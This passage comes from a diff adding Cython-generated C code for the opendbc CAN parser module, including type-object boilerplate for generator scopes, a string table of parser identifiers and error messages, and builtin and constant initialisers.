/*tp_pypy_flags*/ + #endif +}; +#endif + +static struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *__pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr[8]; +static int __pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr = 0; + +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (CYTHON_COMPILING_IN_CPYTHON && likely((int)(__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr)))) { + o = (PyObject*)__pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr[--__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr]; + memset(o, 0, sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr)); + (void) PyObject_INIT(o, t); + PyObject_GC_Track(o); + } else { + o = (*t->tp_alloc)(t, 0); + if (unlikely(!o)) return 0; + } + #endif + return o; +} + +static void __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr(PyObject *o) { + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->__pyx_outer_scope); + Py_CLEAR(p->__pyx_genexpr_arg_0); + Py_CLEAR(p->__pyx_v_addr); + if (CYTHON_COMPILING_IN_CPYTHON && ((int)(__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr)))) { + __pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr[__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr++] = ((struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *)o); + } else { + (*Py_TYPE(o)->tp_free)(o); + } +} + +static int __pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr *)o; + if (p->__pyx_outer_scope) { + e = (*v)(((PyObject *)p->__pyx_outer_scope), a); if (e) return e; + } + if (p->__pyx_genexpr_arg_0) { + e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; + } + if (p->__pyx_v_addr) { + e = (*v)(p->__pyx_v_addr, a); if (e) return e; + } + return 0; +} +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr}, + {Py_tp_new, (void *)__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr}, + {0, 0}, +}; +static PyType_Spec __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr_spec = { + "opendbc.can.parser_pyx.__pyx_scope_struct_1_genexpr", + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, + __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr_slots, +}; +#else + +static PyTypeObject __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr = { + PyVarObject_HEAD_INIT(0, 0) + "opendbc.can.parser_pyx.""__pyx_scope_struct_1_genexpr", /*tp_name*/ + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + 0, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_1_genexpr, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *__pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr[8]; +static int __pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr = 0; + +static PyObject *__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (CYTHON_COMPILING_IN_CPYTHON && likely((int)(__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr)))) { + o = (PyObject*)__pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr[--__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr]; + memset(o, 0, sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr)); + (void) PyObject_INIT(o, t); + PyObject_GC_Track(o); + } else { + o = (*t->tp_alloc)(t, 0); + if (unlikely(!o)) return 0; + } + #endif + return o; +} + +static void __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr(PyObject *o) { + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->__pyx_genexpr_arg_0); + Py_CLEAR(p->__pyx_v__); + Py_CLEAR(p->__pyx_v_address); + if (CYTHON_COMPILING_IN_CPYTHON && ((int)(__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr < 8) & (int)(Py_TYPE(o)->tp_basicsize == sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr)))) { + __pyx_freelist_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr[__pyx_freecount_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr++] = ((struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *)o); + } else { + (*Py_TYPE(o)->tp_free)(o); + } +} + +static int __pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *p = (struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr *)o; + if (p->__pyx_genexpr_arg_0) { + e = (*v)(p->__pyx_genexpr_arg_0, a); if (e) return e; + } + if (p->__pyx_v__) { + e = (*v)(p->__pyx_v__, a); if (e) return e; + } + if (p->__pyx_v_address) { + e = (*v)(p->__pyx_v_address, a); if (e) return e; + } + return 0; +} +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr}, + {Py_tp_new, (void *)__pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr}, + {0, 0}, +}; +static PyType_Spec __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr_spec = { + "opendbc.can.parser_pyx.__pyx_scope_struct_2_genexpr", + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, + __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr_slots, +}; +#else + +static PyTypeObject __pyx_type_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr = { + PyVarObject_HEAD_INIT(0, 0) + "opendbc.can.parser_pyx.""__pyx_scope_struct_2_genexpr", /*tp_name*/ + sizeof(struct __pyx_obj_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + 0, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_7opendbc_3can_10parser_pyx___pyx_scope_struct_2_genexpr, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_kp_u_, __pyx_k_, sizeof(__pyx_k_), 0, 1, 0, 0}, + {&__pyx_n_s_CANDefine, __pyx_k_CANDefine, sizeof(__pyx_k_CANDefine), 0, 0, 1, 1}, + {&__pyx_n_s_CANDefine___reduce_cython, __pyx_k_CANDefine___reduce_cython, sizeof(__pyx_k_CANDefine___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_CANDefine___setstate_cython, __pyx_k_CANDefine___setstate_cython, sizeof(__pyx_k_CANDefine___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_CANParser, __pyx_k_CANParser, sizeof(__pyx_k_CANParser), 0, 0, 1, 1}, + {&__pyx_n_s_CANParser___reduce_cython, __pyx_k_CANParser___reduce_cython, sizeof(__pyx_k_CANParser___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_CANParser___setstate_cython, __pyx_k_CANParser___setstate_cython, sizeof(__pyx_k_CANParser___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_CANParser_update_strings, __pyx_k_CANParser_update_strings, sizeof(__pyx_k_CANParser_update_strings), 0, 0, 1, 1}, + {&__pyx_kp_u_Can_t_find_DBC, __pyx_k_Can_t_find_DBC, sizeof(__pyx_k_Can_t_find_DBC), 0, 1, 0, 0}, + {&__pyx_kp_u_Can_t_find_DBC_2, __pyx_k_Can_t_find_DBC_2, sizeof(__pyx_k_Can_t_find_DBC_2), 0, 1, 0, 0}, + {&__pyx_kp_u_DBC, __pyx_k_DBC, sizeof(__pyx_k_DBC), 0, 1, 0, 0}, + {&__pyx_n_s_MemoryError, __pyx_k_MemoryError, sizeof(__pyx_k_MemoryError), 0, 0, 1, 1}, + {&__pyx_kp_u_None, __pyx_k_None, sizeof(__pyx_k_None), 0, 1, 0, 0}, + {&__pyx_n_s_Number, __pyx_k_Number, sizeof(__pyx_k_Number), 0, 0, 1, 1}, + {&__pyx_n_s_RuntimeError, __pyx_k_RuntimeError, sizeof(__pyx_k_RuntimeError), 0, 0, 1, 1}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_kp_u_Unchecked_addrs, __pyx_k_Unchecked_addrs, sizeof(__pyx_k_Unchecked_addrs), 0, 1, 0, 0}, + {&__pyx_n_s__18, __pyx_k__18, sizeof(__pyx_k__18), 0, 0, 1, 1}, + {&__pyx_kp_u__2, __pyx_k__2, sizeof(__pyx_k__2), 0, 1, 0, 0}, + {&__pyx_kp_u__3, __pyx_k__3, sizeof(__pyx_k__3), 0, 1, 0, 0}, + {&__pyx_kp_u__4, __pyx_k__4, sizeof(__pyx_k__4), 0, 1, 0, 0}, + {&__pyx_n_s__7, __pyx_k__7, sizeof(__pyx_k__7), 0, 0, 1, 1}, + {&__pyx_kp_u__8, __pyx_k__8, sizeof(__pyx_k__8), 0, 1, 0, 0}, + {&__pyx_n_s_add, __pyx_k_add, sizeof(__pyx_k_add), 0, 0, 1, 1}, + {&__pyx_n_s_args, __pyx_k_args, sizeof(__pyx_k_args), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_bus, __pyx_k_bus, sizeof(__pyx_k_bus), 0, 0, 1, 1}, + {&__pyx_n_s_checks, __pyx_k_checks, sizeof(__pyx_k_checks), 0, 0, 1, 1}, + {&__pyx_n_s_class_getitem, __pyx_k_class_getitem, sizeof(__pyx_k_class_getitem), 0, 0, 1, 1}, + {&__pyx_n_s_clear, __pyx_k_clear, sizeof(__pyx_k_clear), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_close, __pyx_k_close, sizeof(__pyx_k_close), 0, 0, 1, 1}, + {&__pyx_n_s_collections, __pyx_k_collections, sizeof(__pyx_k_collections), 0, 0, 1, 1}, + {&__pyx_kp_u_could_not_find_message, __pyx_k_could_not_find_message, sizeof(__pyx_k_could_not_find_message), 0, 1, 0, 0}, + {&__pyx_kp_u_could_not_find_signal, __pyx_k_could_not_find_signal, sizeof(__pyx_k_could_not_find_signal), 0, 1, 0, 0}, + {&__pyx_n_s_cv, __pyx_k_cv, sizeof(__pyx_k_cv), 0, 0, 1, 1}, + {&__pyx_n_s_cv_name, __pyx_k_cv_name, sizeof(__pyx_k_cv_name), 0, 0, 1, 1}, + {&__pyx_n_s_dbc_name, __pyx_k_dbc_name, sizeof(__pyx_k_dbc_name), 0, 0, 1, 1}, + {&__pyx_n_s_defaultdict, __pyx_k_defaultdict, sizeof(__pyx_k_defaultdict), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_enforce_checks, __pyx_k_enforce_checks, sizeof(__pyx_k_enforce_checks), 0, 0, 1, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_genexpr, __pyx_k_genexpr, sizeof(__pyx_k_genexpr), 0, 0, 1, 1}, + {&__pyx_n_s_get, __pyx_k_get, sizeof(__pyx_k_get), 0, 0, 1, 1}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_s_hex, __pyx_k_hex, sizeof(__pyx_k_hex), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_kp_u_in, __pyx_k_in, sizeof(__pyx_k_in), 0, 1, 0, 0}, + {&__pyx_kp_u_in_DBC, __pyx_k_in_DBC, sizeof(__pyx_k_in_DBC), 0, 1, 0, 0}, + {&__pyx_n_s_init___locals_genexpr, __pyx_k_init___locals_genexpr, sizeof(__pyx_k_init___locals_genexpr), 0, 0, 1, 1}, + {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_it, __pyx_k_it, sizeof(__pyx_k_it), 0, 0, 1, 1}, + {&__pyx_n_s_items, __pyx_k_items, sizeof(__pyx_k_items), 0, 0, 1, 1}, + {&__pyx_n_s_l, __pyx_k_l, sizeof(__pyx_k_l), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_new_vals, __pyx_k_new_vals, sizeof(__pyx_k_new_vals), 0, 0, 1, 1}, + {&__pyx_n_s_numbers, __pyx_k_numbers, sizeof(__pyx_k_numbers), 0, 0, 1, 1}, + {&__pyx_n_s_opendbc_can_parser_pyx, __pyx_k_opendbc_can_parser_pyx, sizeof(__pyx_k_opendbc_can_parser_pyx), 0, 0, 1, 1}, + {&__pyx_kp_s_opendbc_can_parser_pyx_pyx, __pyx_k_opendbc_can_parser_pyx_pyx, sizeof(__pyx_k_opendbc_can_parser_pyx_pyx), 0, 0, 1, 0}, + {&__pyx_n_s_print, __pyx_k_print, sizeof(__pyx_k_print), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_kp_s_self_can_self_dbc_cannot_be_conv, __pyx_k_self_can_self_dbc_cannot_be_conv, sizeof(__pyx_k_self_can_self_dbc_cannot_be_conv), 0, 0, 1, 0}, + {&__pyx_kp_s_self_dbc_cannot_be_converted_to, __pyx_k_self_dbc_cannot_be_converted_to, sizeof(__pyx_k_self_dbc_cannot_be_converted_to), 0, 0, 1, 0}, + {&__pyx_n_s_send, __pyx_k_send, sizeof(__pyx_k_send), 0, 0, 1, 1}, + {&__pyx_n_s_sendcan, __pyx_k_sendcan, sizeof(__pyx_k_sendcan), 0, 0, 1, 1}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_signals, __pyx_k_signals, sizeof(__pyx_k_signals), 0, 0, 1, 1}, + {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, + {&__pyx_n_s_split, __pyx_k_split, sizeof(__pyx_k_split), 0, 0, 1, 1}, + {&__pyx_n_s_strings, __pyx_k_strings, sizeof(__pyx_k_strings), 0, 0, 1, 1}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_s_throw, __pyx_k_throw, sizeof(__pyx_k_throw), 0, 0, 1, 1}, + {&__pyx_n_s_update, __pyx_k_update, sizeof(__pyx_k_update), 0, 0, 1, 1}, + {&__pyx_n_s_update_strings, __pyx_k_update_strings, sizeof(__pyx_k_update_strings), 0, 0, 1, 1}, + {&__pyx_n_s_updated_addrs, __pyx_k_updated_addrs, sizeof(__pyx_k_updated_addrs), 0, 0, 1, 1}, + {&__pyx_n_s_v, __pyx_k_v, sizeof(__pyx_k_v), 0, 0, 1, 1}, + {&__pyx_n_s_values, __pyx_k_values, sizeof(__pyx_k_values), 0, 0, 1, 1}, + {&__pyx_n_s_zip, __pyx_k_zip, sizeof(__pyx_k_zip), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_RuntimeError = __Pyx_GetBuiltinName(__pyx_n_s_RuntimeError); if (!__pyx_builtin_RuntimeError) __PYX_ERR(0, 38, __pyx_L1_error) + __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(0, 46, __pyx_L1_error) + __pyx_builtin_print = __Pyx_GetBuiltinName(__pyx_n_s_print); if (!__pyx_builtin_print) __PYX_ERR(0, 78, __pyx_L1_error) + __pyx_builtin_hex = __Pyx_GetBuiltinName(__pyx_n_s_hex); if (!__pyx_builtin_hex) __PYX_ERR(0, 88, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + __pyx_builtin_zip = __Pyx_GetBuiltinName(__pyx_n_s_zip); if (!__pyx_builtin_zip) __PYX_ERR(0, 181, __pyx_L1_error) + __pyx_builtin_MemoryError = __Pyx_GetBuiltinName(__pyx_n_s_MemoryError); if (!__pyx_builtin_MemoryError) __PYX_ERR(1, 68, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "opendbc/can/parser_pyx.pyx":177 + * # separate definition/value pairs + * def_val = def_val.split() + * values = [int(v) for v in def_val[::2]] # <<<<<<<<<<<<<< + * defs = def_val[1::2] + * + */ + __pyx_slice__5 = PySlice_New(Py_None, Py_None, __pyx_int_2); if (unlikely(!__pyx_slice__5)) __PYX_ERR(0, 177, __pyx_L1_error) + __Pyx_GOTREF(__pyx_slice__5); + __Pyx_GIVEREF(__pyx_slice__5); + + /* "opendbc/can/parser_pyx.pyx":178 + * def_val = def_val.split() + * values = [int(v) for v in def_val[::2]] + * defs = def_val[1::2] # <<<<<<<<<<<<<< + * + * # two ways to lookup: address or msg name + */ + __pyx_slice__6 = PySlice_New(__pyx_int_1, Py_None, 